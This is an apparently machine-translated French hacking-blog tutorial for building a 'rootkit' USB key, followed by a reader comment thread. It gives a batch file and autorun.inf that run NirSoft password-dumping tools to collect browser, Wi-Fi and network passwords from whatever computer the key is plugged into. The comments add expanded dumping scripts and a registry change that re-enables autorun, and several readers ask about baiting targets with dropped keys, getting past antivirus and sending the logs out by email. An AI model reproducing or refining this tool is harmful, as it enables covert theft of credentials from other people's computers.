TUTO HACK: Creating a rootkit USB key

FunInformatique 1 year ago 3 minutes of reading

usb rookit

Dernière mise à jour: 7 mai 2022

Today we are going to see how to create a USB key which recovers passwords from a computer. This USB key runs automatically and recovers most passwords store on a computer.

It is really very useful especially when you have lost your Passwords.

To create a rootkit USB key, follow the steps below:

Step 1

We will first download some tools that allow us to recover the passwords of the most common applications. All these applications come from the Nirsoft site (http://www.nirsoft.net/).

Next, we are going to place all the .exe files on our USB key.

usb1

Step 2

Now you have to create a file launch.bat which will automatically open the password recovery programs and it will store the results in a text file.
For this, we must create a new text document with notepad or other and write the code below.

@ Echo off
start WebBrowserPassView.exe / stext folder1 / WebBrowserPassView.txt
start WirelessKeyView.exe / stext folder1 / WirelessKeyView.txt
start netpass.exe / stext folder1 / netpass.txt

Be careful to check that the names of the tools correspond to the names that are written in the file launch.bat .
At this stage, when launch.bat will be executed, these logs will be sent to a folder called dossier1. We must therefore create a new folder and name it dossier1.

Step 3

Then we will create the file autorun.inf. The autorun.inf file is a text file saved at the root of a storage device (DVD, USB key, etc.) allowing the automatic launch of certain programs when inserting a storage device.
When you insert your USB key usually a window appears asking us what we want to do!
In this window, we are going to create a new option that will allow us (once we have clicked on it) to recover passwords from the computer and stored in the folder created in step 2.
To achieve this, open a new text document and insert the following code:

[Autorun]
open = launch.bat
ACTION = 'The name of the new option'

Finally, save the file autorun.inf.

Congratulations ! Your usb rootkit is now ready to use, all you have to do is test it.

Note: AutoRun is no longer available on Windows 7 and Windows 10. With the progression of viruses exploiting the AutoRun feature to install themselves, Microsoft has decided to remove it from Windows 7 and 10 when connecting USB media to a PC.
So to recover passwords for a computer running Windows 7 or Windows 10, you have to click manually on the small program Launch.bat.

Those who liked this article also liked these:

58 Questions / Answers

Gabriel says:

April 4 2023 to 10 44 h min

Hello, this trick is really interesting and I use it now. However, are there any other programs or applications other than this, such as
WebBrowserPassView,
Network Password Recovery
or WirelessKeyView,
that can retrieve e-mails or other useful information like the router password that I could add to my USB rootkit?

Reply
alibaba says:

November 14 2022 to 20 21 h min

could you help me with the WebBrowserPassView my username is displayed in the result but not the password to which the problem could be linked

please

Reply
soft says:

July 10 2022 to 1 25 h min

hello to all I tried to create the rootkit but the one if does not work I wondered if it was not because I am on Windows 11
thank you for your answer 😉

Reply
- jagrey says:
  
  July 15 2022 to 13 20 h min
  
  Exactly, this trick is no longer functional on Windows 10 and 11.
  
  Reply
Minatow says:

24 May 2022 16 in 58 h min

Donut, yes disable Windows antivirus

Reply
Donut says:

March 6 2022 to 14 20 h min

Hello, I tried but it doesn't work. Windows antivirus prevents me from extracting the files because it detects them as viruses. Anyone know what to do?

Reply
neck says:

February 13 2022 to 16 14 h min

I followed everything but when I click on launch.bat it just opens the notepad, am I doing it wrong?

Reply
thy says:

January 31 2022 10 to 32 h min

Hello, before starting the manipulations I wanted to know if the key once prepared works if it is connected to a mobile phone running Android?
please

Reply
- jagrey says:
  
  January 31 2022 14 to 36 h min
  
  No, it only works on Windows.
  
  Reply
  - THy says:
    
    February 18 2022 to 10 12 h min
    
    Hello, Thank you Jagrey,
    you may know the equivalent that runs on android please?
    Thank you
bigbear67 says:

January 7 2022 21 to 27 h min

As always, only Windows users are concerned, I work permanently under Linux so no way to send an execution without my agreement.

Reply
jeremy says:

November 11 2021 to 18 36 h min

Hello, I finished the tutorial, but my rootkit usb key does not work, I would not be able to say why.
I put a screen of the files of the usb key, are you could tell me if I made a mistake.

Reply
- jagrey says:
  
  November 12 2021 to 15 37 h min
  
  Hello Jeremy,
  Microsoft has modified the AutoRun function in order to block this type of attack. Now, when connecting removable media, AutoRun is no longer available.
  So, to recover computer passwords, you need to manually run the launch.bat file.
  
  Reply
sylvain says:

December 30 2017 to 16 17 h min

hello when I plug my USB key into a computer how do I get it to launch

Reply
- jagrey says:
  
  January 2 2018 16 to 33 h min
  
  Hello Sylvain, autorun is no longer available on Windows 7 and 10. With the progression of viruses exploiting the autorun function to install themselves, Microsoft has decided to remove AutoRun from Windows 7 and 10.
  So to recover passwords from a computer, you have to manually click on launch.bat.
  
  Reply
Coco says:

December 5 2017 to 21 43 h min

Hello, when the files open they do not open in the background is there a way to make a command to open in the background?

Reply
- jagrey says:
  
  December 27 2021 to 18 55 h min
  
  Try running WebBrowserPassView only.
  
  Reply
sefa says:

July 1 2017 to 9 26 h min

Hello,
In the part [ACTION: "the name of the new option"], I don't know what to write.
Could you help me please ?
Goods.

Reply
polson says:

April 5 2017 to 0 59 h min

Hi
Small question: Is it possible to complete the technique described above according to several points:
– if you want to use the baiting method (the target recovers the “forgotten” USB key and connects it to his machine), then the target by opening the key will see the tools therein and become aware of the deception.
– I may be wrong, but if the target is on mac, then the autorun does not work and it must manually open the file that has the rootkit or the keylogger
– if we proceed remotely (without physical access to the machine), then we must retrieve the information collected remotely too, can the technique presented incorporate a script or other that sends the log containing the information collected by email? (I'm still a beginner, I probably don't have all the knowledge and the appropriate vocabulary yet)
Thank you in advance!

Reply
makasaki says:

January 3 2017 1 to 00 h min

preener ducky-flasher for the usbs plus A payload scripted by ducky toolkit to make a .bin file which will be at the heart of the usb and find you the joy of an injection which works on windows 10 as at the time of windows xp method changes but you will have the same result. Except that in 8 seconds to my chrono your file is stolen good luck

Reply
- theo says:
  
  January 13 2017 16 to 28 h min
  
  you can be a little more specific because I'm new to this field and I didn't quite understand how to adapt this tutorial to windows 10 :/
  
  Reply
  - tome says:
    
    February 22 2017 to 18 05 h min
    
    Is there a way to make a ducky-flasher preener without buying one?
  - kunter says:
    
    March 21 2017 to 17 12 h min
    
    First it's Rubber Ducky, then if you want to make one you will find several tutorials on youpute, you still need to have a good knowledge of electronics.
    To my knowledge the payloads cannot be launched without the admin pass, so that limits its usefulness a lot.
    When the autorun.inf Microsoft prevents its operation from win XP too dangerous. (already said)
    don't bother with that, forced to launch the batch manually, but without an admin pass, it's dead.
    The question is:
    How to log in as admin with an inaccessible bios, ie impossible to boot with a key or a CD, and limited rights, ie no access to CMD or regedit and the impossibility of launching any app or script.
    The first who finds, I pay a general tour!
Benjamin Dumas says:

16 May 2016 22 in 33 h min

Does it work if we insert this usb drive on mac?

Reply
Theo says:

August 30 2015 to 23 33 h min

Your tutorial is just great, however as I saw in the recurring comments on this subject, I will repeat:
Why most .exe apps launched through the launch.bat file save data in .cfg files and not .txt files?
Thanks in advance for helping us.
And thank you again for this great tutorial 🙂

Reply
- jagrey says:
  
  December 27 2021 to 19 02 h min
  
  This issue has appeared with the latest app updates. Try downloading versions 2.11 or later.
  
  Reply
Spaaag says:

January 27 2015 18 to 43 h min

Hello, the .txt are not in the folder for chrome and firefox… In fact only WirelessPassView is displayed!
A solution?

Reply
- jagrey says:
  
  December 27 2021 to 19 02 h min
  
  This issue has appeared with the latest app updates. Try downloading versions 2.11 or later.
  
  Reply
Antoine says:

December 10 2014 to 15 38 h min

Hello, I am a beginner and I followed this tutorial, and I encounter a problem, after downloading the files and creating the launch.bat and the autorun.inf, when I launch the launch.bat, it opens all the programs then create .cfg files on the key for each of the programs, what should I do? Thank you

Reply
- jagrey says:
  
  December 27 2021 to 19 03 h min
  
  This issue has appeared with the latest app updates. Try downloading versions 2.11 or later.
  
  Reply
pat says:

November 26 2014 to 16 04 h min

FYI all new versions available on nirsoft do not have commands for auto creation of text files (or any other format)

Reply
Guillaume says:

22 September 2014 20 to 19 h min

The problem is that the autorun no longer works! Now Windows blocks them automatically for those coming from a USB key… Any idea?

Reply
Harri says:

August 26 2014 to 23 09 h min

Thank you very good Tutorial & thanks to @Draytane for the modification
Good continuation the site is great!!

Reply
gb88 says:

July 14 2014 to 19 31 h min

hello and thank you so much for this tutorial! everything works very well but I have to run the .bat by myself because the new option is not displayed… I'm on Windows 8, this may have an impact.. Can someone please enlighten me? thank you !!

Reply
troll says:

11 2014 June to 16 20 h min

I succeeded in everything… In English? normal…
I downloaded all of them from different sites….

Reply
Jyfezz says:

5 2014 June to 0 59 h min

Good evening ! Personally, it does not work for mailpv and pspv 🙁
And I wanted to know if it also works on brand and what software should I download for Safari?

Reply
Draytane says:

February 20 2014 to 15 37 h min

top, very good tutorial 🙂 personally I preferred to make one or two alterations, to start I put the exe in a folder named "temp" (for more discretion)
but I left the ini file and the bat in the root.
Then I modified the bat like this:
« mkdir folder
start temp/ChromePass.exe /stext folder/chrome.txt
start temp/iepv.exe /stext folder/iexplorer.txt
start temp/mailpv.exe /stext folder/mail.txt
start temp/mspass.exe /stext folder/mspass.txt
start temp/PasswordFox.exe /stext folder/netpass.txt
start temp/pspv.exe /stext folder/pspv.txt”
like that it creates the folder itself, I find it more practical. but I had to separate myself from the exe which asked for confirmations :,-(

Reply
Guest says:

August 22 2013 to 9 58 h min

No doubt you only took the language files.

Reply
Phaerd says:

October 23 2012 to 9 26 h min

Hello, I would like to know, can we circumvent the problem of anti-virus? That is to say that as soon as I insert my usb key, my pc detects it as malicious and therefore deletes all the files that appear to it to be infected.

Reply
Premium says:

August 7 2012 to 13 55 h min

Hello!
thank you for your tutorial it really helped me thank you.
I have a very small question that may seem silly to you, but hey, I'm taking the risk 🙂
"The name of the new option" what is it? what should I mark?
thank you in advance and good continuation really great your site.

Reply
- Ahmed says:
  
  August 8 2012 to 23 27 h min
  
  Hello Prestige,
  For the name of the new option; you can choose what you want. You can put for example "Open the folder and show the files"
  
  Reply
Premium says:

August 7 2012 to 13 51 h min

Hello!
thank you for your tutorial it really helped me thank you.
I have a very small question that may seem silly to you, but hey, I'm taking the risk 🙂
"The name of the new option" what is it? what should I mark?
thank you in advance and good continuation really great your site.

Reply
Tristan says:

August 3 2012 to 21 30 h min

Hi, I'm back another time. Sorry for the inconvenience but the link is still dead, is there a torrent link or a site to get it? Thank you for your reply !

Reply
- Ahmed says:
  
  August 3 2012 to 23 31 h min
  
  It works perfectly for me, can you check again? Otherwise you can always download them from the original site: http://www.nirsoft.net/password_recovery_tools.html
  
  Reply
  - Tristan says:
    
    August 4 2012 to 15 16 h min
    
    it actually works thank you!
Tristan says:

August 3 2012 to 12 14 h min

Hi, as by chance I have taken the whole pack and I would like to have it back but your link is no longer valid it no longer works, if it is possible to put it back to new
I tried to do it with the tutorial but it gives me errors. Please answer me very quickly. You also told me about remote keyloggers, I would like to know more and know what it is. Thank you in advance and continue like this. It rocks every day, I read your articles and this one is my favorite
answer me quickly !

Reply
- Ahmed says:
  
  August 3 2012 to 18 07 h min
  
  Hello tristan, nice to see you again! 🙂 you're right the link of the pack is dead, I changed it to another one, you can now download the whole pack as before!
  As for Remote keylogger, it is an invisible spyware to monitor all aspects of user activity. It sends to the email address indicated each keystroke typed in a computer and screenshots at regular intervals...
  
  Reply
Imadnohad says:

28 May 2012 11 in 46 h min

' In the tree structure of the registry go to: [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorer], modify the following key, with the value 91 “NoDriveTypeAutoRun”=dword:00000091 finally restart your PC.' Can we make this modification for each pc to which we connect the usb key??

Reply
noName says:

7 May 2012 15 in 47 h min

Hi it was to know why when I run the launch.bat manually I got
“ERROR 5: Access denied”?
And also know pk the autorun does not offer "the name of the new option" in the panel that is displayed when you put the usb key?
thank you so much and I love your tutorials man!

Reply
- kivoshki says:
  
  29 May 2012 20 in 14 h min
  
  To see the name displayed you must authorize the automatic execution of the autorun.
  To enable autorun, Start Menu -> Run -> regedit.exe
  You are looking for: [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorer]
  and change the key value to 91
  “NoDriveTypeAutoRun”=dword:00000091
  
  Reply
Ahmed says:

February 16 2012 to 1 49 h min

Yes of course, it's the same principle! 🙂

Reply
Ahmed says:

February 16 2012 to 1 47 h min

Hi tristan,
It is not possible to send this file automatically by May. The batch is very limited to the set of commands available in cmd.exe, however there are remote keyloggers that allow you to do that!

Reply
- Tristan says:
  
  August 3 2012 to 12 21 h min
  
  hello elahmed I would like to know more about what you said about the existence of remote keyloggers please answer me quickly and have a nice day
  
  Reply
AbuM@lek says:

August 27 2011 to 5 22 h min

Bjr,
Another thing,
When I try, on win 7 even after I have modified the registry key, I get the autorun window which allows you to choose the type of applications,
so the script does not run automatically !!!

Reply
AbuM@lek says:

August 27 2011 to 2 58 h min

Salam Ahmad,
Most tools are detected as Trojan/Virus (False Alerts)
The question is how can we bypass the antivirus not to detect them!!!
because otherwise, it doesn't matter the function of automating the launches.
Thanks for the tutorial ^^.
AM@

Reply
jerzey says:

August 20 2011 to 9 18 h min

Poy Ahmed,
Thank you very much !
The "%random%" script works fine.
I updated via nirsoft.net and indeed mine was not up to date.
Keep posting your articles, I devour them every time =)

Reply
Ahmed El Jaouari says:

August 19 2011 to 22 25 h min

Hi Jerzey,
The first problem is because of the autorun. On some computers autorun is disabled. To activate autorun, go to Start Menu → Run → (type regedit.exe)
In the tree structure of the registry go to: [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorer], modify the following key, with the value 91 “NoDriveTypeAutoRun”=dword:00000091 finally restart your PC.
– For the second problem, try to download the latest version of PasswordFox from http://www.nirsoft.net/utils/passwordfox.html
– Finally, to avoid overwriting old files, you can add the “%random%” command to the lunch.bat file:
start mspass.exe /stext Mdp/mspass%random%.txt

Reply
jerzey says:

August 19 2011 to 18 53 h min

Hello !
I created this very nice rootkit.
However, here are my observations and problems encountered (hoping you can solve them):
– The autorun + .bat are well established on my usb, however they do not launch by themselves when the usb is inserted, the user of the PC must, in a desired way, click on the launch icon.
– The app for Firefox does not work, however. I always have an error message on all the pc used.
– Would it be possible to add a few lines of code so that the script creates a new text file named for example: MDP1 MDP2 etc etc rather than overwriting the old one each time? (I don't know the prog, nevertheless I could try to do that, I've already done a lot of .bat but I have to play with the command books :))

Reply